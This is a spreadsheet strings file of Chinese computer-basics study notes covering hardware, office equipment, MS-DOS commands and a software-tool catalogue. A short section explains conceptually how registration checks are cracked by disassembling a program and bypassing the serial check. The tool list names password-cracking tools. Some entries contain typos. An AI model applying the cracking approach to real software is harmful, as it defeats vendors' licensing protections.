  </si>
  <si>
    <t>DVD-Multi</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVD Light Scribe</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVD-RW</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>松下、日立等公司推出，不能很好地与DVD-ROM兼容；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>定位在消费类电子产品，也存在与DVD光驱兼容问题；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可用刻录机在光盘标签签名“印刷”文字或图像；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>由philips、sony、HP等推出，同时定位在消费类电子产品和电脑存储使用，速度较DVD-RW快；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>3 普通DVD刻录机类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显卡</t>
  </si>
  <si>
    <t>1 显卡的组成</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 性能指标</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.1.1</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.1.2</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1.1.3</t>
  </si>
  <si>
    <t>1.1.4</t>
  </si>
  <si>
    <t>1.1.5</t>
  </si>
  <si>
    <t>1.1.6</t>
  </si>
  <si>
    <t>1.1.7</t>
  </si>
  <si>
    <t>1.1.8</t>
  </si>
  <si>
    <t>1.1.9</t>
  </si>
  <si>
    <t>1.1.10</t>
  </si>
  <si>
    <t>1.1.11</t>
  </si>
  <si>
    <t>1.1.12</t>
  </si>
  <si>
    <t xml:space="preserve">显示芯片 GPU </t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>架构</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>制造工艺</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>渲染管道数目</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>核心时钟频率</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显存位宽（b)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显存带宽（GB/S)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Direct X支持</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Vertex Shader版本</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dixel Shader版本</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显存类型</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PCI -Express</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显存时钟频率</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Geforce 7900GTX)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>G71</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>90nm</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>51.2(显存时钟频率*显存位宽/8)</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>GDDR3</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>X16</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显存</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显示BIOS</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>总线接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>输出接口</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>刷新频率</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>颜色深度</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>主流128和256MB，高端512MB；显存类型、速度、时钟频率；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>负责将显存中的数字信号转换成显示器能接收的模拟信号；RAM DAC：RAM Digital Analog Converter;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>包含了显示芯片和驱动程序的控制程序，产品标识信息；开机时最先看到的便是显卡BIOS内容；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>AGP，PCI-E 16X；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>VGA、DVI、S端子；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DAC向显示器传送信号时，每秒重绘屏幕的次数60-150Hz，现最高可达450Hz，最小应大于72Hx;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>每像素由多少种颜色控制；4、8、16、32位真颜色；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显示器</t>
  </si>
  <si>
    <t>1 CRT显示器：Cathode Ray Tube阴极射线显像管显示器</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 LCD显示器：通过控制是否透光来自动调整明暗度，画面稳定无闪烁，无辐射，其性能指标包括：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>由电子枪、偏转线圈、荫罩、粉屏、玻璃外壳组成；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>性能指标：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>组成：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>分辨率、刷新频率、行频、点距、电磁辐射；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>优势：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可视角度大，无坏点，响应时间极短，色彩还原度高，色彩均匀，是游戏玩家和图像制作人士的首选；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>劣势：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>辐射和屏幕闪烁容易使人产生疲劳；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>点距</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>真实分辨率</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>色彩数量</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>响应时间</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可视角度</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>亮度</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>对比度</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在大小固定的前提下，点距越小图像越清晰；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1024*768,设为800*600时，超出部分为黑屏，扩展显示则效果不好；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>比CRT少，目前主流是18位色，即2的18次方：262144色，现在的操作系统和显卡都支持32位色；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>各像素对输入信号反应的速度，常说的25ms,16,12.8ms就是指响应时，响应时间越短，看动态画面时越不会有尾拖曳的感觉；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>USB接口有4个针脚：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2 中间的两根针脚：销短，负责数据传输，拔出时，先断开数据线；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>1 两侧的两根针脚：销长，用于供电，插入时，先供电；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>商用笔记本</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>最重要的不是NB的性能，多媒体能力和外观，而是系统的稳定性、安全性、今后服务和技术支持能力，如Thinkpad，产品在硬件防护方面做得很到位；外壳经久耐用，内部方面有防滚架设计，有专用的系统补丁和繁多的专用驱动程序来保证系统的稳定性。配置有BIOS密码，硬盘加密，特殊保密装置（如指纹识别或Smart Card等），保密软件等）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>复印机</t>
  </si>
  <si>
    <t>插入电源，打开电源开关，向下层储纸盒装入A4纸（上层装A3纸）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开原稿盖板，将一张需要复印的A4纸复印的一面朝下，再关闭盖板；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>缩小复印：缩小到90%：按面板Zoom区域的“50%”按钮10次；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>手动送纸：默认自动送纸，可使用旁路送纸（将储纸盒中的纸全部取出）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>使用注意事项和技巧；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>A3纸是A4纸的两倍大小，A4纸是A5纸的两倍大小；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>纸要包装好，避免受潮；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>补充新纸张时，应将纸张抖松；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可使用白纸遮住的方法去除阴影和污迹；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>为不透出背面的图像，复印时可以在复印的稿件背面垫一张黑色纸（打开盖板不闭合，即可复印出黑色纸）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>显影浓度可调节；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>更换墨盒：按下复印机前盖左右上端卡口，打开前门盖，抬起墨盒托架，拉出，取出旧碳粉盖，双手水平拿新碳粉盒，左右摇动5-6次，拔出封条，旋转到位后，抬起，推进并卡住；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>传真机</t>
  </si>
  <si>
    <t>按复印份数，按A4按钮（如复印A3纸，则按屏幕上的A3按钮），按Print键；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>放大复印：放大到110%：按面板Zoom区域的“200%”按钮10次；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>排除卡纸故障：打开前盖，按下内部左侧的按钮并抬起主机，逆时钟转动排纸旋钮，如果不是卡在出纸口，而是卡在内部，则应尝试逆时钟转动排纸按钮，如果纸盒不出纸，可能是纸被两侧抵板卡得太紧；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>安装：电话线与Line口相连，接通电源；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>发送</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.1 将文件引导板调节到稿件宽度处，并将稿件文字面向下，插入，直到本机抓住稿件并发出“哗”声为止，屏幕显示stardard;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.2 按监听键或拿起电话手柄，拨打对方传真号码；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.2.1 对方人工接收传真：在电话中要求对方接收，然后会听到接收传真回应的声音，马上按“开始”键；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.2.2 对方自动接收传真：在听到一两声电话响铃后，会很快听至好接收传真回应的声音，马上按“开始”键；　</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>自动接收：按“接收方式”键，使屏幕显示FAX或“Tel/FAX",使用本机或其他工具通知对方，即使响铃也不接电话；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>手动接收：按“润滑油试”键，使屏幕显示为“TEL”，听到响铃后，如果是传真，直接按“开始”，则开始接收，否则，可能是电话；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>传真纸可分为：热敏纸、热转印式普纸、激光式普纸、喷墨式普纸；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在附件内有“打印和传真”；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>扫描仪</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开扫描仪的电源开关；（先要连到电脑）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电脑---附件---打描仪和照相机向导---选择扫描仪首选项</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.1 对话框包括：彩色、灰度照片、黑白照片和文字、自定义设置亮度、对比度、分辨率；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.2 预览：可拖动预览图像的四个控制点调整大小；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.3 命名、文件格式、保存位置；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>打开盖板：稿件下面朝下；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>扫描仪是图像信号输入设备，它对原稿件进行光学扫描，然后将光学图像传送到光电转换器中变换为模拟信号，然后又将模拟信号转换为数字信号，最后通过计算机接口将信号送至计算机；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>扫描仪可分为滚筒式、平板式、便携式；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>先将PC主机和显示器的电源插座插入UPS背面的插孔；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>第一次开机：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.1 储能电池开关ON---自动旁路开关ON---输出开关ON，延时1分钟，旁路灯熄灭，完成开机；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.2 空载运行10分钟后，按照负载功率由小到大的顺序启动负载；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>关机：先关PC，让UPS空载运行10分钟后，再按面板关键；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>日常开机：UPS面板开键，约20分钟后，开启PC；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>可分为在线式和后备式，方波输出和正弦波输出；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>由整流、储能、变换和开关四部分组成；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>电网电压工作正常时，给负载供电的同时，给储能电池充电；当负载过载时，电网电压经整流给负载供电；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>扫描仪和UPS</t>
  </si>
  <si>
    <t>打印机</t>
  </si>
  <si>
    <t>针式打印机：wire printer,Lattice printer,Dot matrix printer也称点阵式打印机；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>它是由打印头上的钢针经过色带在纸上打印，形成一些点玻璃钢组成的字符和图像；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>将喷出的墨点落在纸上的不同位置，形成各种字符和图像；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>激光打印机：Laser printer，使用硒鼓与碳粉；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>原理类似于复印机，然而它使用的是激光；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>故障处理：</t>
  </si>
  <si>
    <t>4.1 总提示缺纸：a 连线或接口损坏；b 传感器上灰尘堆积；c 需重装或升级驱动；d 其他物理故障；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.2 一次送入多张纸：a 纸粘在了一起；b 放入的纸太多；c 厚度不一样的纸；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.3 出现打印乱码：a 更换数据线；b 升级驱动；c 扩充内存；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>软件是如何被破解的</t>
  </si>
  <si>
    <t>软件是如何被破解的</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>软件注册时，会要求你输入用户名和注册码，这部分就是软件的内部通过内置的算法来判断输入的密码是否正确？现在破解程序的发布武大主要有两种；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>破解的难点就是先把程序还原为代码的样子，软件都是使用诸如C类高级语言开发的，经过了高级语言---汇编语言---机器代码的过程，由软件让电脑正常运行；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>反谓反汇编就是将软件机器代码恢复为汇编的语言，软件被反汇编以后，你可以清楚地知道它每一步执行的过程。这样就可以屏蔽软件中验证用户序列号的部分了，汇编的目的就是为了找到判断的“入口”；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MS DOS采用模块结构，由一个引导程序和三个模块程序构成：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Boot引导程序：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Boot是在磁盘初始化时，由格式化命令Format写在软盘第0扇区或硬盘的主引导扇区上的；主要任务是检查哪个驱动器是DOS系统盘，及系统盘根目录上的头两个文件是否是IO.SYS和MSDOS.SYS;并且把IO.SYS读入内存；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IO.SYS及ROM-BIOS(固化在ROM中，是一个具体的设备驱动程序）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IO.SYS是进行输入输出的接口模块，主要任务包括：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.2 解释DOS系统配置文件config.sys,设置系统的运行环境；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.3 装入command.com模块，在系统运行过程中，接到输入输出请求后，先由IO.SYS对命令加以解释，转换成有关设备控制命令，然后再与ROM-bIOS中具体的设备驱动程序发生关联，进而完成用户所要求的输入输出任务；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>2.1 负责调入MSDOS.SYS；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MSDOS.SYS：管理文件、内存、外部设备及其他系统资源；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>command.com：人机界面；是命令处理程序模块，是DOS与用户之间的接口；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.1 接收用户输入的各种命令，解释后加以执行；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.2 设置DOS有关中断向量；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>4.3 检查启动时有无DOS的自动执行批处理文件（autoexec.bat)，若有，则负责解释执行；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>command.com的内存包括：暂驻内存模块CCPT和常驻内存模块CCPR构成，CCPT包括a 接收及解释程序；b 内存命令程序；c 批命令处理程序；d 外部命令装入程序；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DOS提示符位置显示当前所在的文件夹（目录）；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>help:显示所支持的文件列表；help 命令名：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dir \? 显示Dir命令的帮助；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>在命令提示符下导航到某个驱动器：X：</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CD\ 转到当前驱动器的根文件夹；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CD 转到当前驱动器的父文件夹；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cd c:\users\wwu\desktop↙ dir \d \on \s &gt;songlist.txt:在桌面生成一个songlist.txt的文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DOS通配符：代替文件名中相应位置上的一个或多个字符：*:代表一个或多个字符；如：del *.sys,即可删除当前目录的sys文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>引导盘：Boot引导程序+IO.sys+MSDOS.sys+command.com即可启动到DOS，如果除此之外还包含许多DOS命令的磁盘则称为系统盘；在DOS引导系统时，依次将三个核心文件读入，然后 磁盘寻找并加载config.sys(系统配置文件）和Auto.bat(自动批处理文件，批处理文件是一些DOS命令的集合，CMD:*.BAT可执行），最后完成系统引导；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>内部命令：是由command.com本身可实现的命令，内部命令对应的子程序就包含在command.com文件里，所以执行内部命令无须加载其它文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>外部命令：是那些存储在磁盘上的文件，不包含在command.com文件中，运行时，必须从磁盘加载到内存的暂存程序区域里，所以执行外部命令时，必须确保在当前目录下存在该文件，外部命令分为命令com文件和EXE文件，BAT批处理文件；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DOS、系统提示符、windows PE</t>
  </si>
  <si>
    <t>DOS、系统提示符、windows PE</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络工具</t>
  </si>
  <si>
    <t>图文工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>多媒体工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>光盘工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件处理工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>安全防护工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>办公软件</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>行业应用</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统诊断与修复</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>密码破解工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网页浏览工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>邮件收发工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>即时通信工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件下载工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件上传工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络电话工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络短信工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络游戏</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网页制作</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>网络共享互联</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>远程登录工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>IE8.0\Maxthon\Firefox;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>outlook2007/windows mail.foxmail;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>QQ,MSN;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Thunder,emule;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>cuteFTP</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Skype</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Fetion</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ourgame/QQ game</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Dreamweaver</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Sygate;wingate;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ftern;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>五笔输入</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>汉化翻译</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>动画制作</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>截图工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>桌面工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>图像浏览工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>图像处理工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>极点、陈桥、海峰</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>金山词霸</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>MicroMedia Flash</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Snagit</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>ACD see,windows照片库</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>视频播放工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>音频播放工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>视频解码工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>多媒体文件格式转换工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>视频编辑工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>DVD制作工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows media player11,realplayer,KM;暴风影音；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>千千静听</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>K-lite mega code pack;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>real producer plus;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows Movie Maker;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows DVD Maker;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘分区工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘备份工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>硬盘坏道检测、修复工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>磁盘修复工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>分区调整、转换工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Partition Magic,Acronis Disk Director;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Ghost;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>PQMagic,</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>diskgenius</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统测试工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>系统优化工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>CPU-A,Everest,Nokia monitor test;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>windows优化大师；超级兔子；</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>光盘刻录工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>虚拟不驱工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>UltraISO</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>Nero;</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>文件管理工具</t>
    <phoneticPr fontId="1" type="noConversion"/>
